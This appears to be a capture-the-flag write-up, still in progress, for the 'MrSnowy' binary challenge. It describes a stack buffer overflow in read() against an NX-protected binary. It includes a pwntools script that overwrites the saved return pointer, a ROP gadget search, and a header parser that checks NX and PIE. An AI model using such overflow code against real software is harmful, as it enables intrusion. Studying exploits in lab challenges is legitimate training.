MrSnowy
There is ❄️ snow everywhere!! Kids are playing around, everything looks amazing. But, this ☃️ snowman... it scares me.. He is always 👀 staring at Santa's house. Something must be wrong with him.
Flag
Progress so far
- The `read()` reads 0x108 bytes of input from stdin
- The buffer is uninitialized
- The function call sits at `*investigate+67`
- The stack frame of the function only has a size of 0x40 bytes
- `checksec --file=mrsnowy` reports NX being enabled
- So no shellcode will be placeable unless there is executable space
- This hints to ROP chaining
- The binary should be patched to get rid of the time-taking animation
- Just `nop` the banner() function call using radare2
- Overwriting the return pointer of `investigate()` using pwntools:
```python
from pwn import *
import ipdb

context(arch='x86_64', os='linux')
context.terminal = ['/usr/bin/alacritty', '-e']
e = ELF("mr_snowy")
p = process(e.path)

# read banner and stuff until input is requested (the '>' prompt)
def do_read():
    while True:
        ll = p.read()
        print(ll)
        if b'>' in ll:
            break

# if not patched wait for the animation and send 1
do_read()
p.sendline(b'1')
do_read()

# write 0x48 bytes (0x40 frame + saved rbp) and overwrite the return pointer
# with an address near the top of the stack frame
p.sendline(b'\xCC' * 0x48 + p64(0x7fffffffc000))

# start the python debugger to get a coredump which is loadable by gdb
ipdb.set_trace()
```
- Trying to find ROP Gadgets using pwntools
```python
from pwn import *

e = ELF("mr_snowy")
rop = ROP(e)          # was ROP(elf): 'elf' is undefined, the ELF object is 'e'
print(rop.rbx)        # gadget that pops into rbx, if one exists
print(rop.gadgets)    # dict of address -> Gadget found in the binary
```
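The NX line from `checksec` above is just the `PT_GNU_STACK` program header: no `PF_X` bit means the kernel maps the stack non-executable, which is why the notes move on to ROP. The check below is an added example (not the challenge's or pwntools' code) that parses that header with the standard library; the ELF images it inspects are constructed inline, not the real `mr_snowy`.

```python
import struct

PT_GNU_STACK = 0x6474E551   # p_type the linker uses to declare stack permissions
PF_X = 0x1                  # executable flag in p_flags
ET_DYN = 3                  # e_type of a PIE executable / shared object
EHDR_FMT = '<16sHHIQQQIHHHHHH'   # ELF64 header, little endian (64 bytes)
PHDR_FMT = '<IIQQQQQQ'           # ELF64 program header (56 bytes)

def build_elf(gnu_stack_flags=None, e_type=2):
    """Constructed minimal ELF64 image: header plus optional PT_GNU_STACK (not a real binary)."""
    phdrs = []
    if gnu_stack_flags is not None:
        phdrs.append(struct.pack(PHDR_FMT, PT_GNU_STACK, gnu_stack_flags, 0, 0, 0, 0, 0, 16))
    ident = b'\x7fELF' + bytes([2, 1, 1, 0]) + b'\x00' * 8   # ELF64, LE, version 1
    ehdr = struct.pack(EHDR_FMT, ident, e_type, 0x3E, 1, 0, 64, 0, 0,
                       64, 56, len(phdrs), 64, 0, 0)
    return ehdr + b''.join(phdrs)

def check_binary(data):
    """Report NX and PIE the way checksec derives them from the ELF headers."""
    if data[:4] != b'\x7fELF' or data[4] != 2 or data[5] != 1:
        raise ValueError('expected a little-endian ELF64 image')
    fields = struct.unpack_from(EHDR_FMT, data, 0)
    e_type, e_phoff, e_phentsize, e_phnum = fields[1], fields[5], fields[9], fields[10]
    stack_flags = None
    for i in range(e_phnum):
        p_type, p_flags = struct.unpack_from('<II', data, e_phoff + i * e_phentsize)
        if p_type == PT_GNU_STACK:
            stack_flags = p_flags
    # No PT_GNU_STACK at all: Linux falls back to an executable stack.
    nx = stack_flags is not None and not (stack_flags & PF_X)
    return {'nx': nx, 'pie': e_type == ET_DYN}

if __name__ == '__main__':
    print(check_binary(build_elf(0x6)))        # RW stack  -> NX enabled
    print(check_binary(build_elf(0x7)))        # RWX stack -> NX disabled
    print(check_binary(build_elf(None)))       # header missing -> NX disabled
```

Run it against a real file with `check_binary(open(path, 'rb').read())`; the same headers are what `ELF(...).nx` and `checksec` read.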

